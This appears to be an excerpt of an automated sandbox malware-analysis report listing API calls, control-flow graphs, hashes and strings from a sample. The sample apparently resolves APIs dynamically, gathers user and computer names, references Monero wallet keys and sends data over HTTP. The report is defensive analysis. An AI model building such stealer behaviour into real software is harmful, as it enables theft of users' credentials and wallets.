                                • Associated: 00000000.00000002.1485733803.0000000001039000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1485733803.000000000105D000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1485733803.0000000001066000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1485733803.0000000001074000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1486112735.0000000001075000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1486222235.0000000001217000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1486238168.0000000001218000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_b70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: AddressProc$LibraryLoad
                                • String ID: NtQueryInformationProcess
                                • API String ID: 2238633743-2781105232
                                • Opcode ID: d412fc0c818ed6fe5e11a68cc3e782423b6e5fbb5f5d85677b06bc90dbeb55b9
                                • Instruction ID: 1445ab9dbef7a9c9b63b5940a5123a4f0c1f6b523cab74bdd47be5119cdb3055
                                • Opcode Fuzzy Hash: d412fc0c818ed6fe5e11a68cc3e782423b6e5fbb5f5d85677b06bc90dbeb55b9
                                • Instruction Fuzzy Hash: 27A12AB9508340EFD754EFACED88A663BF9F74C301794471AA609C3764DA3A9841CB72

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph (basic blocks of b745c0, with their outgoing edges):
                                • 764 b745c0-b74695: RtlAllocateHeap -> 781
                                • 781 b746a0-b746a6 -> 782, 783
                                • 783 b746ac-b7474a -> 781 (loop)
                                • 782 b7474f-b747a9: VirtualProtect
                                APIs
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00B7460F
                                • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 00B7479C
                                Strings
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00B7466D, 00B746CD, 00B745E8, 00B7475A, 00B74678, 00B74638, 00B745DD, 00B74683, 00B745D2, 00B7462D, 00B7471E, 00B74662, 00B745C7, 00B74729, 00B7474F, 00B74765, 00B746D8, 00B7477B, 00B74657, 00B74622, 00B7473F, 00B74643, 00B746AC, 00B746C2, 00B74734, 00B746B7, 00B745F3, 00B74617, 00B74713, 00B74770
                                Memory Dump Source
                                • Source File: 00000000.00000002.1485597816.0000000000B71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true
                                • Associated: 00000000.00000002.1485586383.0000000000B70000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1485597816.0000000000C21000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1485597816.0000000000C2D000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1485597816.0000000000C52000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1485597816.0000000000DBA000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1485733803.0000000000DCE000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1485733803.0000000000F52000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1485733803.0000000001039000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1485733803.000000000105D000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1485733803.0000000001066000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1485733803.0000000001074000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1486112735.0000000001075000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1486222235.0000000001217000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1486238168.0000000001218000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_b70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: AllocateHeapProtectVirtual
                                • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                                • API String ID: 1542196881-2218711628
                                • Opcode ID: 2d375cca564b86ac61bacd50f316ad7c880283f8731c9f582d211a462d434f9b
                                • Instruction ID: 68faca59fd0cba82159aa90d5fbdd6538fdb69eb73e0ed414f592e347349344c
                                • Opcode Fuzzy Hash: 2d375cca564b86ac61bacd50f316ad7c880283f8731c9f582d211a462d434f9b
                                • Instruction Fuzzy Hash: 294124216C6634EEEE35BBA88DC6F9D73BADF42748F5050A2AB04126D0CF6065234627

                                Control-flow Graph

                                control_flow_graph 801 b74880-b74942 call b8a7a0 call b747b0 call b8a740 * 5 InternetOpenA StrCmpCA 816 b74944 801->816 817 b7494b-b7494f 801->817 816->817 818 b74955-b74acd call b88b60 call b8a920 call b8a8a0 call b8a800 * 2 call b8a9b0 call b8a8a0 call b8a800 call b8a9b0 call b8a8a0 call b8a800 call b8a920 call b8a8a0 call b8a800 call b8a9b0 call b8a8a0 call b8a800 call b8a9b0 call b8a8a0 call b8a800 call b8a9b0 call b8a920 call b8a8a0 call b8a800 * 2 InternetConnectA 817->818 819 b74ecb-b74ef3 InternetCloseHandle call b8aad0 call b79ac0 817->819 818->819 905 b74ad3-b74ad7 818->905 829 b74ef5-b74f2d call b8a820 call b8a9b0 call b8a8a0 call b8a800 819->829 830 b74f32-b74fa2 call b88990 * 2 call b8a7a0 call b8a800 * 8 819->830 829->830 906 b74ae5 905->906 907 b74ad9-b74ae3 905->907 908 b74aef-b74b22 HttpOpenRequestA 906->908 907->908 909 b74ebe-b74ec5 InternetCloseHandle 908->909 910 b74b28-b74e28 call b8a9b0 call b8a8a0 call b8a800 call b8a920 call b8a8a0 call b8a800 call b8a9b0 call b8a8a0 call b8a800 call b8a9b0 call b8a8a0 call b8a800 call b8a9b0 call b8a8a0 call b8a800 call b8a9b0 call b8a8a0 call b8a800 call b8a920 call b8a8a0 call b8a800 call b8a9b0 call b8a8a0 call b8a800 call b8a9b0 call b8a8a0 call b8a800 call b8a920 call b8a8a0 call b8a800 call b8a9b0 call b8a8a0 call b8a800 call b8a9b0 call b8a8a0 call b8a800 call b8a9b0 call b8a8a0 call b8a800 call b8a9b0 call b8a8a0 call b8a800 call b8a920 call b8a8a0 call b8a800 call b8a740 call b8a920 * 2 call b8a8a0 call b8a800 * 2 call b8aad0 lstrlen call b8aad0 * 2 lstrlen call b8aad0 HttpSendRequestA 908->910 909->819 1021 b74e32-b74e5c InternetReadFile 910->1021 1022 b74e67-b74eb9 InternetCloseHandle call b8a800 1021->1022 1023 b74e5e-b74e65 1021->1023 1022->909 1023->1022 1024 b74e69-b74ea7 call b8a9b0 call b8a8a0 call b8a800 1023->1024 1024->1021
                                APIs
                                  • Part of subcall function 00B8A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00B8A7E6
                                  • Part of subcall function 00B747B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00B74839
                                  • Part of subcall function 00B747B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00B74849
                                  • Part of subcall function 00B8A740: lstrcpy.KERNEL32(00B90E17,00000000), ref: 00B8A788
                                • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00B74915
                                • StrCmpCA.SHLWAPI(?,0093E310), ref: 00B7493A
                                • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00B74ABA
                                • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,00B90DDB,00000000,?,?,00000000,?,",00000000,?,0093E2B0), ref: 00B74DE8
                                • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00B74E04
                                • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00B74E18
                                • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00B74E49
                                • InternetCloseHandle.WININET(00000000), ref: 00B74EAD
                                • InternetCloseHandle.WININET(00000000), ref: 00B74EC5
                                • HttpOpenRequestA.WININET(00000000,0093E210,?,0093D8A8,00000000,00000000,00400100,00000000), ref: 00B74B15
                                  • Part of subcall function 00B8A9B0: lstrlen.KERNEL32(?,00938A70,?,\Monero\wallet.keys,00B90E17), ref: 00B8A9C5
                                  • Part of subcall function 00B8A9B0: lstrcpy.KERNEL32(00000000), ref: 00B8AA04
                                  • Part of subcall function 00B8A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00B8AA12
                                  • Part of subcall function 00B8A8A0: lstrcpy.KERNEL32(?,00B90E17), ref: 00B8A905
                                  • Part of subcall function 00B8A920: lstrcpy.KERNEL32(00000000,?), ref: 00B8A972
                                  • Part of subcall function 00B8A920: lstrcat.KERNEL32(00000000), ref: 00B8A982
                                • InternetCloseHandle.WININET(00000000), ref: 00B74ECF
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1485597816.0000000000B71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_b70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                                • String ID: "$"$------$------$------
                                • API String ID: 460715078-2180234286
                                • Opcode ID: f4ac99773893c1e8af6b0041f290f2e26b881068834dd57c8c3085bbc2bc17bf
                                • Instruction ID: 97987b12f9bd655a8f5437190a413001dbc4d2bc6870774854162c7f1cdffc8b
                                • Opcode Fuzzy Hash: f4ac99773893c1e8af6b0041f290f2e26b881068834dd57c8c3085bbc2bc17bf
                                • Instruction Fuzzy Hash: FA12AC71910118AAEB15FB54DD92FEEB3B8AF14300F5041EAF106725A1EF742F49CB62
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00B87910
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00B87917
                                • GetComputerNameA.KERNEL32(?,00000104), ref: 00B8792F
                                Memory Dump Source
                                • Source File: 00000000.00000002.1485597816.0000000000B71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_b70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateComputerNameProcess
                                • String ID:
                                • API String ID: 1664310425-0
                                • Opcode ID: 8a1493e38ac13df3717b713f208f58f066f8efe8e6d1a18ea9cdbcc7dc799bef
                                • Instruction ID: 8a92566b396194605e19bd00743acfb1b0ffbc073e17733e59b34a92d050a033
                                • Opcode Fuzzy Hash: 8a1493e38ac13df3717b713f208f58f066f8efe8e6d1a18ea9cdbcc7dc799bef
                                • Instruction Fuzzy Hash: 430162B1944204EBC700EF98DD45BAABBF8F704B25F20425AE545E2790D7745940CBA1
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00B711B7), ref: 00B87880
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00B87887
                                • GetUserNameA.ADVAPI32(00000104,00000104), ref: 00B8789F
                                Memory Dump Source
                                • Source File: 00000000.00000002.1485597816.0000000000B71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_b70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateNameProcessUser
                                • String ID:
                                • API String ID: 1296208442-0
                                • Opcode ID: 20f1646b416a1b46ecd6059508c16eba99872a9d1c8d5614d05df2e124faa9ee
                                • Instruction ID: 9180bf539becb7a90c8629fddd34cc3e9d068687c1176eb71b02379de82ab89d
                                • Opcode Fuzzy Hash: 20f1646b416a1b46ecd6059508c16eba99872a9d1c8d5614d05df2e124faa9ee
                                • Instruction Fuzzy Hash: F0F04FB1944208EBC700DF99DD49FAEBBB8EB04711F10025AFA05E2790C7745904CBA1
                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.1485597816.0000000000B71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_b70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: ExitInfoProcessSystem
                                • String ID:
                                • API String ID: 752954902-0
                                • Opcode ID: 748be3b57adbdaf214d68d449800a4bfc95d1d1f9be1be77f30113fd14a0da91
                                • Instruction ID: 2fde0a4b55fd49acd9a6602a609e1d19a31351bfe9f587b53667e221f08e47c3
                                • Opcode Fuzzy Hash: 748be3b57adbdaf214d68d449800a4bfc95d1d1f9be1be77f30113fd14a0da91
                                • Instruction Fuzzy Hash: CBD05E74D0430CDBCB00DFE8D8496DDBBB8FB08321F000694D905B2340EA315481CAB6

                                Control-flow Graph

                                control_flow_graph 633 b89c10-b89c1a 634 b89c20-b8a031 GetProcAddress * 43 633->634 635 b8a036-b8a0ca LoadLibraryA * 8 633->635 634->635 636 b8a0cc-b8a141 GetProcAddress * 5 635->636 637 b8a146-b8a14d 635->637 636->637 638 b8a153-b8a211 GetProcAddress * 8 637->638 639 b8a216-b8a21d 637->639 638->639 640 b8a298-b8a29f 639->640 641 b8a21f-b8a293 GetProcAddress * 5 639->641 642 b8a2a5-b8a332 GetProcAddress * 6 640->642 643 b8a337-b8a33e 640->643 641->640 642->643 644 b8a41f-b8a426 643->644 645 b8a344-b8a41a GetProcAddress * 9 643->645 646 b8a428-b8a49d GetProcAddress * 5 644->646 647 b8a4a2-b8a4a9 644->647 645->644 646->647 648 b8a4ab-b8a4d7 GetProcAddress * 2 647->648 649 b8a4dc-b8a4e3 647->649 648->649 650 b8a515-b8a51c 649->650 651 b8a4e5-b8a510 GetProcAddress * 2 649->651 652 b8a612-b8a619 650->652 653 b8a522-b8a60d GetProcAddress * 10 650->653 651->650 654 b8a61b-b8a678 GetProcAddress * 4 652->654 655 b8a67d-b8a684 652->655 653->652 654->655 656 b8a69e-b8a6a5 655->656 657 b8a686-b8a699 GetProcAddress 655->657 658 b8a708-b8a709 656->658 659 b8a6a7-b8a703 GetProcAddress * 4 656->659 657->656 659->658
                                APIs
                                • GetProcAddress.KERNEL32(75550000,00926320), ref: 00B89C2D
                                • GetProcAddress.KERNEL32(75550000,00926420), ref: 00B89C45
                                • GetProcAddress.KERNEL32(75550000,00938F88), ref: 00B89C5E
                                • GetProcAddress.KERNEL32(75550000,00938FA0), ref: 00B89C76
                                • GetProcAddress.KERNEL32(75550000,0093C898), ref: 00B89C8E
                                • GetProcAddress.KERNEL32(75550000,0093C9A0), ref: 00B89CA7
                                • GetProcAddress.KERNEL32(75550000,0092B3D8), ref: 00B89CBF
                                • GetProcAddress.KERNEL32(75550000,0093C988), ref: 00B89CD7
                                • GetProcAddress.KERNEL32(75550000,0093C8E0), ref: 00B89CF0
                                • GetProcAddress.KERNEL32(75550000,0093CA18), ref: 00B89D08
                                • GetProcAddress.KERNEL32(75550000,0093CA30), ref: 00B89D20
                                • GetProcAddress.KERNEL32(75550000,00926360), ref: 00B89D39
                                • GetProcAddress.KERNEL32(75550000,00926400), ref: 00B89D51
                                • GetProcAddress.KERNEL32(75550000,00926380), ref: 00B89D69
                                • GetProcAddress.KERNEL32(75550000,009263A0), ref: 00B89D82
                                • GetProcAddress.KERNEL32(75550000,0093CA48), ref: 00B89D9A
                                • GetProcAddress.KERNEL32(75550000,0093C8C8), ref: 00B89DB2
                                • GetProcAddress.KERNEL32(75550000,0092B450), ref: 00B89DCB
                                • GetProcAddress.KERNEL32(75550000,009265A0), ref: 00B89DE3
                                • GetProcAddress.KERNEL32(75550000,0093C910), ref: 00B89DFB
                                • GetProcAddress.KERNEL32(75550000,0093C838), ref: 00B89E14
                                • GetProcAddress.KERNEL32(75550000,0093C8F8), ref: 00B89E2C
                                • GetProcAddress.KERNEL32(75550000,0093CAA8), ref: 00B89E44
                                • GetProcAddress.KERNEL32(75550000,00926440), ref: 00B89E5D
                                • GetProcAddress.KERNEL32(75550000,0093C8B0), ref: 00B89E75
                                • GetProcAddress.KERNEL32(75550000,0093C928), ref: 00B89E8D
                                • GetProcAddress.KERNEL32(75550000,0093C940), ref: 00B89EA6
                                • GetProcAddress.KERNEL32(75550000,0093C958), ref: 00B89EBE
                                • GetProcAddress.KERNEL32(75550000,0093C970), ref: 00B89ED6
                                • GetProcAddress.KERNEL32(75550000,0093C9B8), ref: 00B89EEF
                                • GetProcAddress.KERNEL32(75550000,0093C9D0), ref: 00B89F07
                                • GetProcAddress.KERNEL32(75550000,0093CAC0), ref: 00B89F1F
                                • GetProcAddress.KERNEL32(75550000,0093C820), ref: 00B89F38
                                • GetProcAddress.KERNEL32(75550000,00939F48), ref: 00B89F50
                                • GetProcAddress.KERNEL32(75550000,0093C850), ref: 00B89F68
                                • GetProcAddress.KERNEL32(75550000,0093CA60), ref: 00B89F81
                                • GetProcAddress.KERNEL32(75550000,00926480), ref: 00B89F99
                                • GetProcAddress.KERNEL32(75550000,0093C9E8), ref: 00B89FB1
                                • GetProcAddress.KERNEL32(75550000,00926460), ref: 00B89FCA
                                • GetProcAddress.KERNEL32(75550000,0093CA00), ref: 00B89FE2
                                • GetProcAddress.KERNEL32(75550000,0093CA78), ref: 00B89FFA
                                • GetProcAddress.KERNEL32(75550000,00926500), ref: 00B8A013
                                • GetProcAddress.KERNEL32(75550000,00926520), ref: 00B8A02B
                                • LoadLibraryA.KERNEL32(0093CA90,?,00B85CA3,00B90AEB,?,?,?,?,?,?,?,?,?,?,00B90AEA,00B90AE3), ref: 00B8A03D
                                • LoadLibraryA.KERNEL32(0093CAD8,?,00B85CA3,00B90AEB,?,?,?,?,?,?,?,?,?,?,00B90AEA,00B90AE3), ref: 00B8A04E
                                • LoadLibraryA.KERNEL32(0093C7F0,?,00B85CA3,00B90AEB,?,?,?,?,?,?,?,?,?,?,00B90AEA,00B90AE3), ref: 00B8A060
                                • LoadLibraryA.KERNEL32(0093C808,?,00B85CA3,00B90AEB,?,?,?,?,?,?,?,?,?,?,00B90AEA,00B90AE3), ref: 00B8A072
                                • LoadLibraryA.KERNEL32(0093C868,?,00B85CA3,00B90AEB,?,?,?,?,?,?,?,?,?,?,00B90AEA,00B90AE3), ref: 00B8A083
                                • LoadLibraryA.KERNEL32(0093C880,?,00B85CA3,00B90AEB,?,?,?,?,?,?,?,?,?,?,00B90AEA,00B90AE3), ref: 00B8A095
                                • LoadLibraryA.KERNEL32(0093CD18,?,00B85CA3,00B90AEB,?,?,?,?,?,?,?,?,?,?,00B90AEA,00B90AE3), ref: 00B8A0A7
                                • LoadLibraryA.KERNEL32(0093CB98,?,00B85CA3,00B90AEB,?,?,?,?,?,?,?,?,?,?,00B90AEA,00B90AE3), ref: 00B8A0B8
                                • GetProcAddress.KERNEL32(75750000,00926860), ref: 00B8A0DA
                                • GetProcAddress.KERNEL32(75750000,0093CDD8), ref: 00B8A0F2
                                • GetProcAddress.KERNEL32(75750000,009388B0), ref: 00B8A10A
                                • GetProcAddress.KERNEL32(75750000,0093CB50), ref: 00B8A123
                                • GetProcAddress.KERNEL32(75750000,009268E0), ref: 00B8A13B
                                • GetProcAddress.KERNEL32(73AA0000,0092AF00), ref: 00B8A160
                                • GetProcAddress.KERNEL32(73AA0000,009268A0), ref: 00B8A179
                                • GetProcAddress.KERNEL32(73AA0000,0092B338), ref: 00B8A191
                                • GetProcAddress.KERNEL32(73AA0000,0093CB20), ref: 00B8A1A9
                                • GetProcAddress.KERNEL32(73AA0000,0093CBB0), ref: 00B8A1C2
                                • GetProcAddress.KERNEL32(73AA0000,009267C0), ref: 00B8A1DA
                                • GetProcAddress.KERNEL32(73AA0000,00926920), ref: 00B8A1F2
                                • GetProcAddress.KERNEL32(73AA0000,0093CBC8), ref: 00B8A20B
                                • GetProcAddress.KERNEL32(757E0000,009267E0), ref: 00B8A22C
                                • GetProcAddress.KERNEL32(757E0000,009268C0), ref: 00B8A244
                                • GetProcAddress.KERNEL32(757E0000,0093CB38), ref: 00B8A25D
                                • GetProcAddress.KERNEL32(757E0000,0093CD30), ref: 00B8A275
                                • GetProcAddress.KERNEL32(757E0000,00926900), ref: 00B8A28D
                                • GetProcAddress.KERNEL32(758D0000,0092B068), ref: 00B8A2B3
                                • GetProcAddress.KERNEL32(758D0000,0092AFA0), ref: 00B8A2CB
                                • GetProcAddress.KERNEL32(758D0000,0093CD60), ref: 00B8A2E3
                                • GetProcAddress.KERNEL32(758D0000,00926800), ref: 00B8A2FC
                                • GetProcAddress.KERNEL32(758D0000,00926940), ref: 00B8A314
                                • GetProcAddress.KERNEL32(758D0000,0092B090), ref: 00B8A32C
                                • GetProcAddress.KERNEL32(76BE0000,0093CB08), ref: 00B8A352
                                • GetProcAddress.KERNEL32(76BE0000,009269C0), ref: 00B8A36A
                                • GetProcAddress.KERNEL32(76BE0000,00938800), ref: 00B8A382
                                • GetProcAddress.KERNEL32(76BE0000,0093CDA8), ref: 00B8A39B
                                • GetProcAddress.KERNEL32(76BE0000,0093CAF0), ref: 00B8A3B3
                                • GetProcAddress.KERNEL32(76BE0000,00926960), ref: 00B8A3CB
                                • GetProcAddress.KERNEL32(76BE0000,00926980), ref: 00B8A3E4
                                • GetProcAddress.KERNEL32(76BE0000,0093CCD0), ref: 00B8A3FC
                                • GetProcAddress.KERNEL32(76BE0000,0093CB68), ref: 00B8A414
                                • GetProcAddress.KERNEL32(75670000,00926680), ref: 00B8A436
                                • GetProcAddress.KERNEL32(75670000,0093CDC0), ref: 00B8A44E
                                • GetProcAddress.KERNEL32(75670000,0093CC88), ref: 00B8A466
                                • GetProcAddress.KERNEL32(75670000,0093CC28), ref: 00B8A47F
                                • GetProcAddress.KERNEL32(75670000,0093CD00), ref: 00B8A497
                                • GetProcAddress.KERNEL32(759D0000,009269A0), ref: 00B8A4B8
                                • GetProcAddress.KERNEL32(759D0000,009266C0), ref: 00B8A4D1
                                • GetProcAddress.KERNEL32(76D80000,009269E0), ref: 00B8A4F2
                                • GetProcAddress.KERNEL32(76D80000,0093CCE8), ref: 00B8A50A
                                • GetProcAddress.KERNEL32(6FAA0000,00926A00), ref: 00B8A530
                                • GetProcAddress.KERNEL32(6FAA0000,009266E0), ref: 00B8A548
                                • GetProcAddress.KERNEL32(6FAA0000,00926700), ref: 00B8A560
                                • GetProcAddress.KERNEL32(6FAA0000,0093CB80), ref: 00B8A579
                                • GetProcAddress.KERNEL32(6FAA0000,00926A20), ref: 00B8A591
                                • GetProcAddress.KERNEL32(6FAA0000,00926840), ref: 00B8A5A9
                                • GetProcAddress.KERNEL32(6FAA0000,009266A0), ref: 00B8A5C2
                                • GetProcAddress.KERNEL32(6FAA0000,00926740), ref: 00B8A5DA
                                • GetProcAddress.KERNEL32(6FAA0000,InternetSetOptionA), ref: 00B8A5F1
                                • GetProcAddress.KERNEL32(6FAA0000,HttpQueryInfoA), ref: 00B8A607
                                • GetProcAddress.KERNEL32(75480000,0093CD48), ref: 00B8A629
                                • GetProcAddress.KERNEL32(75480000,00938920), ref: 00B8A641
                                • GetProcAddress.KERNEL32(75480000,0093CC10), ref: 00B8A659
                                • GetProcAddress.KERNEL32(75480000,0093CD78), ref: 00B8A672
                                • GetProcAddress.KERNEL32(753B0000,009267A0), ref: 00B8A693
                                • GetProcAddress.KERNEL32(6FA30000,0093CBE0), ref: 00B8A6B4
                                • GetProcAddress.KERNEL32(6FA30000,00926720), ref: 00B8A6CD
                                • GetProcAddress.KERNEL32(6FA30000,0093CCB8), ref: 00B8A6E5
                                • GetProcAddress.KERNEL32(6FA30000,0093CBF8), ref: 00B8A6FD
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1485597816.0000000000B71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true
                                • Associated: 00000000.00000002.1485586383.0000000000B70000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1485597816.0000000000C21000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1485597816.0000000000C2D000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1485597816.0000000000C52000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1485597816.0000000000DBA000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1485733803.0000000000DCE000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1485733803.0000000000F52000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1485733803.0000000001039000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1485733803.000000000105D000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1485733803.0000000001066000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1485733803.0000000001074000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1486112735.0000000001075000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1486222235.0000000001217000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1486238168.0000000001218000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_b70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: AddressProc$LibraryLoad
                                • String ID: HttpQueryInfoA$InternetSetOptionA
                                • API String ID: 2238633743-1775429166
                                • Opcode ID: 5f868670439fd0ae952cd20429a8de4a8696ed900aba458f51842ad5bbe5c7da
                                • Instruction ID: a474a3158f3ad0a8b8af5147a5f337d2ab80c56696c77804d7356ed657293f88
                                • Opcode Fuzzy Hash: 5f868670439fd0ae952cd20429a8de4a8696ed900aba458f51842ad5bbe5c7da
                                • Instruction Fuzzy Hash: A4622BB9508300EFC354DFADED889663BF9F74C701764871AA609C3764DA3A9842DB72

                                Control-flow Graph

